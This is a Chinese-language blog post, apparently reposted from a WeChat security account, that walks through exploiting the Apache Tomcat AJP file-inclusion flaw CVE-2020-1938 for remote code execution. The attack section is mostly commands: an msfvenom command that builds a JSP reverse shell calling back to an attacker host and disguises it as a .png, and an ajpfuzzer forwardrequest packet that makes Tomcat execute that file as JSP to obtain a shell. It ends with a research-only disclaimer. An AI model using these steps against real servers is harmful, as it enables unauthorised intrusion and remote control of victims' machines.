2月20日,国家信息安全漏洞共享平台(CNVD)发布了Apache Tomcat文件包含漏洞(CNVD-2020-10487/CVE-2020-1938)。该漏洞是由于Tomcat AJP协议存在缺陷而导致,攻击者利用该漏洞可通过构造特定参数,读取服务器webapp下的任意文件。若目标服务器同时存在文件上传功能,攻击者可进一步实现远程代码执行。目前,厂商已发布新版本完成漏洞修复。
漏洞详情请查看Apache Tomcat文件包含漏洞通告(附poc)
存在此漏洞Tomcat版本:
7.*分支7.0.100之前版本
8.*分支8.5.51之前版本
9.*分支9.0.31之前版本
此处只表RCE方式。
msf生成反弹马,监听
首先使用msf生成反弹shell马,为方便上传之用直接生成为.png后缀:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.211.55.5 LPORT=999 R >ma.png
在msf监听
木马执行
放入项目目录,此处假设目标机图片上传路径为/t/22
下载AJP包构造器ajpfuzzer
运行java -jar ajpfuzzer_v0.6.jar
连接目标端口connect 127.0.0.1 8009
执行如下命令构造并发送AJP包,其中/t/22/ma.png为木马路径,其中11.jsp可以换为任意该web项目中没有的jsp文件,这样tomcat才会去调用DefaultServlet
forwardrequest 2 "HTTP/1.1" "/11.jsp" 127.0.0.1 127.0.0.1 porto 8009 false "Cookie:AAAA=BBBB","Accept-Encoding:identity" "javax.servlet.include.request_uri:11.jsp","javax.servlet.include.path_info:/t/22/ma.png","javax.servlet.include.servlet_path:/"
请求发送成功后ma.png被作为jsp解析,成功获取shell
原文始发于微信公众号(指尖安全):CVE-2020-1938 幽灵猫漏洞RCE
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论